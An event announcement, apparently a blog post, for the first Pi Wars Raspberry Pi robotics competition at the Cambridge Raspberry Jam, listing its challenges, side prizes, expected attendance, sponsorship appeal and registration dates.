
On 6th December this year, the Cambridge Raspberry Jam (CamJam) will play host to the first ever dedicated Raspberry Pi robotics competition: Pi Wars. Named after the BBC series Robot Wars, this competition is challenge-based and is similar to a ‘robot olympics’. Robots will take part in challenges to score points and, as we all know, points mean prizes! Our aim isn’t to have robots destroy each other – we want people to compete to show what they’ve managed to get their robots to do!

We’ve put together some overall rules for the competition which you can read here.

The robot challenges are as follows:

  • Line Follower
  • Obstacle Course
  • Proximity Alert
  • Robot Golf
  • Straight Line Speed Test
  • Sumo Battle
  • Three Point Turn
  • Aesthetics
  • Code Quality

You can read a full description of each challenge by visiting this page.

We’ve also got some side-competitions into which competing robots are automatically entered:

  • Smallest robot
  • Best non-competing robot
  • Best autonomous robot
  • Most feature-rich robot
  • The Jim Darby Prize for Excessive Blinkiness
  • Most innovative robot
  • Most visually appealing robot

We’re also hoping to have some non-competing robots in our Show-and-Tell area.

A robot

We are expecting (okay, hoping!) to have 16 robot competitors. This will give us a nice sized competition without having so many that we’re there until midnight :-) We’re even hoping that it will be an international competition – we’ve already had interest from a team in Egypt! Obviously, we’ll also have tickets available for spectators, of which we’re expecting between 100 and 150.

We are looking for sponsors to supply prizes for the competition and you can get more information on that by visiting this page.

Registration for the competition opens on 15th September and registration for spectator tickets will open sometime in late October/early November. We’re hoping that it will be an extremely popular event… Who knows? This could be the start of an annual event!

If you’d like to read more about Pi Wars, visit www.piwars.org.